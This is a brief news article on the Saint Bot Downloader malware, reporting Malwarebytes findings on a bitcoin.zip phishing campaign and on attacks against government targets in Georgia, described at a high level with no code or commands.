Cybercriminals keep developing more sophisticated malware and methods to deploy them which makes it difficult to keep track of them for security researchers. Saint Bot Downloader is turning out to be a new cyber threat for security researchers in a short span.
The findings of the researchers from Malwarebytes suggest scammers have launched a new phishing campaign designed to steal credentials and dump malware. The scam sends an email with a bitcoin.zip file attached. The victim is lured to download the file, with an offering to access a Bitcoin wallet. This triggers the chain of infections which leads to downloading Saint Bot.
The zip file attached contains a malicious PowerShell script. It tries to download the next stage of malicious payloads, from the embedded link which contains several executable files.
Saint Bot is capable of dropping stealers such as Taurus Stealer or AutoIt-based stealers. Though its design indicates it is capable of delivering other kinds of malware as well.
What makes Saint Bot Unique?
Saint Bot employs several techniques used primarily in mature malware codes. Apart from this it also uses techniques such as code obfuscation, process injection, and anti-analysis have been employed across several stages of the infection cycle.
Saint Bot Downloader Latest targets
Saint Bot malware was used in a number of attacks targeting government institutions. A COVID-19 themed attack was carried out in Georgia, emails with LNK files attached were circulated. Leading to a malicious document and decoy PDF files used as droppers to deliver Saint Bot malware.